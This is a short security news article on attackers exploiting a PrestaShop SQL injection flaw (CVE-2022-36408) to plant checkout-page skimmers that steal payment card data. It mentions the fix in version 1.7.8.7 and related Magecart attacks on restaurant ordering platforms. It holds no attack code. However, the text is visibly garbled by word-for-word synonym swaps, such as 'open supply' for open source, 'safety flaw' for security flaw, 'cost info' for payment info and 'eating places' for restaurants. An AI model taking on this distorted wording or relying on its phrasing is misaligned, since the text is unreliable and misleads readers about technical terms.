Malicious actors are exploiting a beforehand unknown safety flaw within the open supply PrestaShop e-commerce platform to inject malicious skimmer code designed to swipe delicate info.
“Attackers have discovered a method to make use of a safety vulnerability to hold out arbitrary code execution in servers working PrestaShop web sites,” the corporate noted in an advisory printed on July 22.
PrestaShop is marketed because the main open-source e-commerce answer in Europe and Latin America, utilized by practically 300,000 on-line retailers worldwide.
The objective of the infections is to introduce malicious code able to stealing cost info entered by prospects on checkout pages. Outlets utilizing outdated variations of the software program or different weak third-party modules look like the prime targets.
The PrestaShop maintainers additionally mentioned it discovered a zero-day flaw in its service that it mentioned has been addressed in version 1.7.8.7, though they cautioned that “we can not make certain that it is the one method for them to carry out the assault.”
“This safety repair strengthens the MySQL Smarty cache storage towards code injection assaults,” PrestaShop famous. “This legacy function is maintained for backward compatibility causes and might be faraway from future PrestaShop variations.”
The problem in query is an SQL injection vulnerability affecting variations 1.6.0.10 or better, and is being tracked as CVE-2022-36408.
Profitable exploitation of the flaw may allow an attacker to submit a specifically crafted request that grants the flexibility to execute arbitrary directions, on this case, inject a pretend cost kind on the checkout web page to assemble bank card info.
The event follows a wave of Magecart attacks focusing on restaurant ordering platforms MenuDrive, Harbortouch, and InTouchPOS, resulting in the compromise of at the least 311 eating places.